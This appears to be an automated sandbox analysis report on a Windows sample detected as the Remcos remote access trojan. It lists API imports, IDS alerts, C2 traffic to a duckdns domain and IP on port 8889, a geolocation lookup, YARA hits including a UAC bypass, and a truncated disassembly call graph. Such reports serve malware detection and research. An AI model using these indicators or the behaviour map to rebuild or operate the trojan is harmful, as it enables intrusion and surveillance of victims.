                              ADVAPI32.dll | CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                              SHELL32.dll | ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                              ole32.dll | CoInitializeEx, CoUninitialize, CoGetObject
                              SHLWAPI.dll | PathFileExistsW, PathFileExistsA, StrToIntA
                              WINMM.dll | waveInUnprepareHeader, waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader
                              WS2_32.dll | gethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                              urlmon.dll | URLOpenBlockingStreamW, URLDownloadToFileW
                              gdiplus.dll | GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                              WININET.dll | InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                              Language of compilation system | Country where language is spoken
                              English | United States
                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                              05/03/24-00:35:56.320861 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              05/03/24-00:35:56.084786 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              May 3, 2024 00:35:55.896814108 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:35:56.083476067 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:35:56.083558083 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:35:56.084785938 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:35:56.320861101 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:35:56.322182894 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:35:56.511254072 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:35:56.568487883 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:35:57.040203094 CEST | 49701 | 80 | 192.168.2.7 | 178.237.33.50
                              May 3, 2024 00:35:57.204977036 CEST | 80 | 49701 | 178.237.33.50 | 192.168.2.7
                              May 3, 2024 00:35:57.205075979 CEST | 49701 | 80 | 192.168.2.7 | 178.237.33.50
                              May 3, 2024 00:35:57.214010000 CEST | 49701 | 80 | 192.168.2.7 | 178.237.33.50
                              May 3, 2024 00:35:57.381263018 CEST | 80 | 49701 | 178.237.33.50 | 192.168.2.7
                              May 3, 2024 00:35:57.381365061 CEST | 49701 | 80 | 192.168.2.7 | 178.237.33.50
                              May 3, 2024 00:35:58.381120920 CEST | 80 | 49701 | 178.237.33.50 | 192.168.2.7
                              May 3, 2024 00:35:58.381217957 CEST | 49701 | 80 | 192.168.2.7 | 178.237.33.50
                              May 3, 2024 00:35:58.558502913 CEST | 49701 | 80 | 192.168.2.7 | 178.237.33.50
                              May 3, 2024 00:35:58.637902975 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:35:58.721952915 CEST | 80 | 49701 | 178.237.33.50 | 192.168.2.7
                              May 3, 2024 00:35:58.872060061 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:00.205888987 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:00.207392931 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:00.437438965 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:03.846792936 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:03.848531008 CEST | 49702 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:03.896688938 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.036782980 CEST | 8889 | 49702 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:04.036937952 CEST | 49702 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.041227102 CEST | 49702 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.083647966 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:04.094733000 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.131050110 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.271764040 CEST | 8889 | 49702 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:04.277808905 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:04.277895927 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.282496929 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:04.506237030 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:05.057044029 CEST | 49702 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:05.245914936 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:05.287278891 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:05.298032999 CEST | 8889 | 49702 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:05.390862942 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:05.572920084 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:05.574073076 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:05.756052971 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:05.781913042 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:05.965328932 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:06.074960947 CEST | 49702 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:06.265201092 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:06.319127083 CEST | 8889 | 49702 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:06.374522924 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:06.585892916 CEST | 49703 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:06.768230915 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:06.949251890 CEST | 8889 | 49700 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:07.162323952 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              May 3, 2024 00:36:09.611807108 CEST | 8889 | 49702 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:09.614541054 CEST | 8889 | 49703 | 85.60.29.68 | 192.168.2.7
                              May 3, 2024 00:36:12.293354988 CEST | 49700 | 8889 | 192.168.2.7 | 85.60.29.68
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              May 3, 2024 00:35:55.789414883 CEST | 61286 | 53 | 192.168.2.7 | 1.1.1.1
                              May 3, 2024 00:35:55.894139051 CEST | 53 | 61286 | 1.1.1.1 | 192.168.2.7
                              May 3, 2024 00:35:56.941400051 CEST | 59542 | 53 | 192.168.2.7 | 1.1.1.1
                              May 3, 2024 00:35:57.032411098 CEST | 53 | 59542 | 1.1.1.1 | 192.168.2.7
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              May 3, 2024 00:35:55.789414883 CEST | 192.168.2.7 | 1.1.1.1 | 0x7c55 | Standard query (0) | sendfiletiahforem.duckdns.org | A (IP address) | IN (0x0001) | false
                              May 3, 2024 00:35:56.941400051 CEST | 192.168.2.7 | 1.1.1.1 | 0x3847 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              May 3, 2024 00:35:55.894139051 CEST | 1.1.1.1 | 192.168.2.7 | 0x7c55 | No error (0) | sendfiletiahforem.duckdns.org | | 85.60.29.68 | A (IP address) | IN (0x0001) | false
                              May 3, 2024 00:35:57.032411098 CEST | 1.1.1.1 | 192.168.2.7 | 0x3847 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                              • geoplugin.net
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.7 | 49701 | 178.237.33.50 | 80 | 524 | C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              Timestamp | Bytes transferred | Direction | Data
                              May 3, 2024 00:35:57.214010000 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              May 3, 2024 00:35:57.381263018 CEST | 1173 | IN | HTTP/1.1 200 OK
                              date: Thu, 02 May 2024 22:35:57 GMT
                              server: Apache
                              content-length: 965
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                              Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                              Target ID:0
                              Start time:00:35:54
                              Start date:03/05/2024
                              Path:C:\Users\user\Desktop\xi0TpAxHGMsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\xi0TpAxHGMsm.exe"
                              Imagebase:0x400000
                              File size:494'080 bytes
                              MD5 hash:EFFE954DA69F8377295E43C84E48BD77
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:00:36:06
                              Start date:03/05/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
                              Imagebase:0xdd0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true


                                Execution Graph

                                Execution Coverage:5.3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:17.9%
                                Total number of Nodes:1827
                                Total number of Limit Nodes:52
___scrt_get_show_window_mode 48334->48349 48336 401e65 22 API calls 48335->48336 48337 40ed9c 48336->48337 48339 401e65 22 API calls 48337->48339 48342 401e65 22 API calls 48338->48342 48338->48364 48341 40edae 48339->48341 48340 40ef06 ___scrt_get_show_window_mode 48791 4136f8 RegOpenKeyExA 48340->48791 48345 401e65 22 API calls 48341->48345 48343 40ed3e 48342->48343 48346 401e65 22 API calls 48343->48346 48347 40edc0 48345->48347 48348 40ed53 48346->48348 48351 401e65 22 API calls 48347->48351 48731 40da34 48348->48731 48561 413947 48349->48561 48350 40ef51 48352 401e65 22 API calls 48350->48352 48355 40ede9 48351->48355 48356 40ef76 48352->48356 48360 401e65 22 API calls 48355->48360 48358 402093 28 API calls 48356->48358 48357 401f13 28 API calls 48359 40ed72 48357->48359 48361 40ef88 48358->48361 48362 401f09 11 API calls 48359->48362 48363 40edfa 48360->48363 48571 41376f RegCreateKeyA 48361->48571 48362->48364 48789 40cdf9 46 API calls _wcslen 48363->48789 48364->48334 48364->48340 48368 40ee0a 48368->48349 48370 40eea3 ctype 48373 401e65 22 API calls 48370->48373 48371 401e65 22 API calls 48372 40efaa 48371->48372 48375 43baac _strftime 40 API calls 48372->48375 48374 40eeba 48373->48374 48374->48350 48377 40eece 48374->48377 48376 40efb7 48375->48376 48378 40efc1 48376->48378 48379 40efe4 48376->48379 48380 401e65 22 API calls 48377->48380 48794 41cd9b 88 API calls ___scrt_get_show_window_mode 48378->48794 48384 402093 28 API calls 48379->48384 48382 40eed7 48380->48382 48385 41bc5e 28 API calls 48382->48385 48383 40efc8 CreateThread 48383->48379 49209 41d45d 10 API calls 48383->49209 48386 40eff9 48384->48386 48387 40eee3 48385->48387 48388 402093 28 API calls 48386->48388 48790 40f474 107 API calls 48387->48790 48390 40f008 48388->48390 48392 41b4ef 80 API calls 48390->48392 48391 40eee8 48391->48350 48393 40eeef 48391->48393 48394 40f00d 48392->48394 48393->48276 48395 401e65 22 API calls 48394->48395 48396 40f019 48395->48396 48397 401e65 22 API calls 
48396->48397 48398 40f02b 48397->48398 48399 401e65 22 API calls 48398->48399 48400 40f04b 48399->48400 48401 43baac _strftime 40 API calls 48400->48401 48402 40f058 48401->48402 48403 401e65 22 API calls 48402->48403 48404 40f063 48403->48404 48405 401e65 22 API calls 48404->48405 48406 40f074 48405->48406 48407 401e65 22 API calls 48406->48407 48408 40f089 48407->48408 48409 401e65 22 API calls 48408->48409 48410 40f09a 48409->48410 48411 40f0a1 StrToIntA 48410->48411 48577 409de4 48411->48577 48414 401e65 22 API calls 48415 40f0bc 48414->48415 48416 40f101 48415->48416 48417 40f0c8 48415->48417 48420 401e65 22 API calls 48416->48420 48795 4344ea 48417->48795 48422 40f111 48420->48422 48421 401e65 22 API calls 48423 40f0e4 48421->48423 48425 40f159 48422->48425 48426 40f11d 48422->48426 48424 40f0eb CreateThread 48423->48424 48424->48416 49207 419fb4 110 API calls 2 library calls 48424->49207 48427 401e65 22 API calls 48425->48427 48428 4344ea new 22 API calls 48426->48428 48429 40f162 48427->48429 48430 40f126 48428->48430 48433 40f1cc 48429->48433 48434 40f16e 48429->48434 48431 401e65 22 API calls 48430->48431 48432 40f138 48431->48432 48435 40f13f CreateThread 48432->48435 48436 401e65 22 API calls 48433->48436 48437 401e65 22 API calls 48434->48437 48435->48425 49206 419fb4 110 API calls 2 library calls 48435->49206 48438 40f1d5 48436->48438 48439 40f17e 48437->48439 48440 40f1e1 48438->48440 48441 40f21a 48438->48441 48442 401e65 22 API calls 48439->48442 48444 401e65 22 API calls 48440->48444 48602 41b60d GetComputerNameExW GetUserNameW 48441->48602 48445 40f193 48442->48445 48447 40f1ea 48444->48447 48802 40d9e8 32 API calls 48445->48802 48451 401e65 22 API calls 48447->48451 48448 401f13 28 API calls 48450 40f22e 48448->48450 48453 401f09 11 API calls 48450->48453 48454 40f1ff 48451->48454 48452 40f1a6 48455 401f13 28 API calls 48452->48455 48456 40f237 48453->48456 48465 43baac _strftime 40 API calls 48454->48465 48459 40f1b2 48455->48459 48457 40f240 
SetProcessDEPPolicy 48456->48457 48458 40f243 CreateThread 48456->48458 48457->48458 48460 40f264 48458->48460 48461 40f258 CreateThread 48458->48461 49177 40f7a7 48458->49177 48462 401f09 11 API calls 48459->48462 48463 40f279 48460->48463 48464 40f26d CreateThread 48460->48464 48461->48460 49208 4120f7 139 API calls 48461->49208 48466 40f1bb CreateThread 48462->48466 48468 40f2cc 48463->48468 48470 402093 28 API calls 48463->48470 48464->48463 49204 4126db 38 API calls ___scrt_get_show_window_mode 48464->49204 48467 40f20c 48465->48467 48466->48433 49205 401be9 50 API calls _strftime 48466->49205 48803 40c162 7 API calls 48467->48803 48613 4134ff RegOpenKeyExA 48468->48613 48471 40f29c 48470->48471 48804 4052fd 28 API calls 48471->48804 48476 40f2ed 48478 41bc5e 28 API calls 48476->48478 48481 40f2fd 48478->48481 48805 41361b 31 API calls 48481->48805 48485 40f313 48486 401f09 11 API calls 48485->48486 48489 40f31e 48486->48489 48487 40f346 DeleteFileW 48488 40f34d 48487->48488 48487->48489 48488->48296 48489->48296 48489->48487 48490 40f334 Sleep 48489->48490 48490->48489 48491->48169 48492->48173 48493->48180 48494->48176 48495->48186 48496->48187 48497->48189 48498->48192 48499->48196 48500->48198 48501->48200 48502->48203 48504 44f06b 48503->48504 48505 44f062 48503->48505 48504->48210 48508 44ef58 49 API calls 5 library calls 48505->48508 48507->48210 48508->48504 48510 41cb8f LoadLibraryA GetProcAddress 48509->48510 48511 41cb7f GetModuleHandleA GetProcAddress 48509->48511 48512 41cbb8 44 API calls 48510->48512 48513 41cba8 LoadLibraryA GetProcAddress 48510->48513 48511->48510 48512->48215 48513->48512 48808 41b4a8 FindResourceA 48514->48808 48517 43bd51 new 21 API calls 48518 40f3ed ctype 48517->48518 48519 4020b7 28 API calls 48518->48519 48520 40f408 48519->48520 48521 401fe2 28 API calls 48520->48521 48522 40f413 48521->48522 48523 401fd8 11 API calls 48522->48523 48524 40f41c 48523->48524 48525 43bd51 new 21 API calls 48524->48525 48526 40f42d ctype 
48525->48526 48811 406dd8 48526->48811 48528 40f460 48528->48217 48530 40fb23 48529->48530 48532 40fb2a 48529->48532 48814 402163 11 API calls 48530->48814 48532->48225 48815 401fab 48533->48815 48535 40d073 CreateMutexA GetLastError 48535->48274 48816 41bfb7 48536->48816 48541 401fe2 28 API calls 48542 41b2ff 48541->48542 48543 401fd8 11 API calls 48542->48543 48544 41b307 48543->48544 48545 4135a6 31 API calls 48544->48545 48546 41b35d 48544->48546 48547 41b330 48545->48547 48546->48280 48548 41b33b StrToIntA 48547->48548 48549 41b352 48548->48549 48550 41b349 48548->48550 48551 401fd8 11 API calls 48549->48551 48825 41cf69 22 API calls 48550->48825 48551->48546 48554 40772a 48553->48554 48555 413549 3 API calls 48554->48555 48556 407731 48555->48556 48556->48291 48556->48292 48558 41bc72 48557->48558 48826 40b904 48558->48826 48560 41bc7a 48560->48308 48562 413965 48561->48562 48563 406dd8 28 API calls 48562->48563 48564 41397a 48563->48564 48565 4020f6 28 API calls 48564->48565 48566 41398a 48565->48566 48567 41376f 14 API calls 48566->48567 48568 413994 48567->48568 48569 401fd8 11 API calls 48568->48569 48570 4139a1 48569->48570 48570->48370 48572 4137bf 48571->48572 48574 413788 48571->48574 48573 401fd8 11 API calls 48572->48573 48575 40ef9e 48573->48575 48576 41379a RegSetValueExA RegCloseKey 48574->48576 48575->48371 48576->48572 48578 409e02 _wcslen 48577->48578 48579 409e24 48578->48579 48580 409e0d 48578->48580 48582 40da34 32 API calls 48579->48582 48581 40da34 32 API calls 48580->48581 48583 409e15 48581->48583 48584 409e2c 48582->48584 48585 401f13 28 API calls 48583->48585 48586 401f13 28 API calls 48584->48586 48587 409e1f 48585->48587 48588 409e3a 48586->48588 48590 401f09 11 API calls 48587->48590 48589 401f09 11 API calls 48588->48589 48591 409e42 48589->48591 48592 409e79 48590->48592 48855 40915b 28 API calls 48591->48855 48840 40a109 48592->48840 48595 409e54 48596 403014 28 API calls 48595->48596 48598 409e5f 48596->48598 48599 401f13 28 
API calls 48598->48599 48600 409e69 48599->48600 48601 401f09 11 API calls 48600->48601 48601->48587 48603 40417e 28 API calls 48602->48603 48604 41b65c 48603->48604 49002 4042fc 48604->49002 48607 403014 28 API calls 48608 41b672 48607->48608 48609 401f09 11 API calls 48608->48609 48610 41b67b 48609->48610 48611 401f09 11 API calls 48610->48611 48612 40f223 48611->48612 48612->48448 48614 413520 RegQueryValueExA RegCloseKey 48613->48614 48615 40f2e4 48613->48615 48614->48615 48615->48321 48615->48476 48617 40f392 48616->48617 48618 413a3f RegDeleteValueW 48616->48618 48617->48315 48618->48617 48620 40dd5b 48619->48620 48621 4134ff 3 API calls 48620->48621 48622 40dd62 48621->48622 48626 40dd81 48622->48626 49077 401707 48622->49077 48624 40dd6f 49080 413877 RegCreateKeyA 48624->49080 48627 414f2a 48626->48627 48628 4020df 11 API calls 48627->48628 48629 414f3e 48628->48629 49094 41b8b3 48629->49094 48632 4020df 11 API calls 48633 414f54 48632->48633 48634 401e65 22 API calls 48633->48634 48635 414f62 48634->48635 48636 43baac _strftime 40 API calls 48635->48636 48637 414f6f 48636->48637 48638 414f81 48637->48638 48639 414f74 Sleep 48637->48639 48640 402093 28 API calls 48638->48640 48639->48638 48641 414f90 48640->48641 48642 401e65 22 API calls 48641->48642 48643 414f99 48642->48643 48644 4020f6 28 API calls 48643->48644 48645 414fa4 48644->48645 48646 41be1b 28 API calls 48645->48646 48647 414fac 48646->48647 49098 40489e WSAStartup 48647->49098 48649 414fb6 48650 401e65 22 API calls 48649->48650 48651 414fbf 48650->48651 48652 401e65 22 API calls 48651->48652 48708 41503e 48651->48708 48653 414fd8 48652->48653 48654 401e65 22 API calls 48653->48654 48655 414fe9 48654->48655 48657 401e65 22 API calls 48655->48657 48656 41be1b 28 API calls 48656->48708 48658 414ffa 48657->48658 48659 401e65 22 API calls 48658->48659 48661 41500b 48659->48661 48660 406c1e 28 API calls 48660->48708 48663 401e65 22 API calls 48661->48663 48662 401fe2 28 API calls 48662->48708 48664 
41501c 48663->48664 48665 401e65 22 API calls 48664->48665 48666 41502e 48665->48666 49123 40473d 89 API calls 48666->49123 48668 402f10 28 API calls 48668->48708 48669 402093 28 API calls 48669->48708 48670 41b4ef 80 API calls 48670->48708 48672 41518c WSAGetLastError 49124 41cae1 30 API calls 48672->49124 48673 40482d 3 API calls 48673->48708 48676 404f51 105 API calls 48676->48708 48677 4048c8 97 API calls 48677->48708 48678 404e26 99 API calls 48678->48708 48679 40531e 28 API calls 48679->48708 48680 401e65 22 API calls 48683 415a33 48680->48683 48681 401e8d 11 API calls 48681->48708 48682 406383 28 API calls 48682->48708 48683->48680 48684 43baac _strftime 40 API calls 48683->48684 49126 40b051 85 API calls 48683->49126 48685 415acf Sleep 48684->48685 48685->48708 48688 40905c 28 API calls 48688->48708 48689 441e81 20 API calls 48689->48708 48690 401e65 22 API calls 48690->48708 48691 4020f6 28 API calls 48691->48708 48692 4136f8 3 API calls 48692->48708 48693 4135a6 31 API calls 48693->48708 48694 40417e 28 API calls 48694->48708 48697 401e65 22 API calls 48698 415439 GetTickCount 48697->48698 48699 41bb8e 28 API calls 48698->48699 48699->48708 48701 41bb8e 28 API calls 48701->48708 48702 41ba96 30 API calls 48702->48708 48703 41bd1e 28 API calls 48703->48708 48705 402f31 28 API calls 48705->48708 48706 402ea1 28 API calls 48706->48708 48707 404aa1 61 API calls 48707->48708 48708->48656 48708->48660 48708->48662 48708->48668 48708->48669 48708->48670 48708->48672 48708->48673 48708->48676 48708->48677 48708->48678 48708->48679 48708->48681 48708->48682 48708->48683 48708->48688 48708->48689 48708->48690 48708->48691 48708->48692 48708->48693 48708->48694 48708->48697 48708->48701 48708->48702 48708->48703 48708->48705 48708->48706 48708->48707 48709 401fd8 11 API calls 48708->48709 48710 401f09 11 API calls 48708->48710 48711 404c10 188 API calls 48708->48711 48713 415a71 CreateThread 48708->48713 49099 414ee9 48708->49099 49104 41b7e0 48708->49104 49107 
4145bd 48708->49107 49110 40dd89 48708->49110 49116 41bc42 48708->49116 49119 41bae6 GetLastInputInfo GetTickCount 48708->49119 49120 40f8d1 GetLocaleInfoA 48708->49120 49125 4052fd 28 API calls 48708->49125 48709->48708 48710->48708 48711->48708 48713->48708 49167 41ad17 106 API calls 48713->49167 48714->48233 48715->48241 48716->48245 48719 4020df 11 API calls 48718->48719 48720 406c2a 48719->48720 48721 4032a0 28 API calls 48720->48721 48722 406c47 48721->48722 48722->48266 48724 413573 RegQueryValueExA RegCloseKey 48723->48724 48725 40eba4 48723->48725 48724->48725 48725->48263 48725->48281 48726->48270 48727->48299 48728->48292 48729->48283 48730->48297 48732 401f86 11 API calls 48731->48732 48733 40da50 48732->48733 48734 40da70 48733->48734 48735 40daa5 48733->48735 48736 40da66 48733->48736 49168 41b5b4 29 API calls 48734->49168 48739 41bfb7 2 API calls 48735->48739 48738 40db99 GetLongPathNameW 48736->48738 48741 40417e 28 API calls 48738->48741 48742 40daaa 48739->48742 48740 40da79 48743 401f13 28 API calls 48740->48743 48744 40dbae 48741->48744 48745 40db00 48742->48745 48746 40daae 48742->48746 48784 40da83 48743->48784 48747 40417e 28 API calls 48744->48747 48748 40417e 28 API calls 48745->48748 48749 40417e 28 API calls 48746->48749 48751 40dbbd 48747->48751 48752 40db0e 48748->48752 48750 40dabc 48749->48750 48758 40417e 28 API calls 48750->48758 49171 40ddd1 28 API calls 48751->49171 48757 40417e 28 API calls 48752->48757 48753 401f09 11 API calls 48753->48736 48755 40dbd0 49172 402fa5 28 API calls 48755->49172 48760 40db24 48757->48760 48761 40dad2 48758->48761 48759 40dbdb 49173 402fa5 28 API calls 48759->49173 49170 402fa5 28 API calls 48760->49170 49169 402fa5 28 API calls 48761->49169 48765 40dbe5 48768 401f09 11 API calls 48765->48768 48766 40db2f 48769 401f13 28 API calls 48766->48769 48767 40dadd 48770 401f13 28 API calls 48767->48770 48771 40dbef 48768->48771 48772 40db3a 48769->48772 48773 40dae8 48770->48773 48774 401f09 11 API calls 
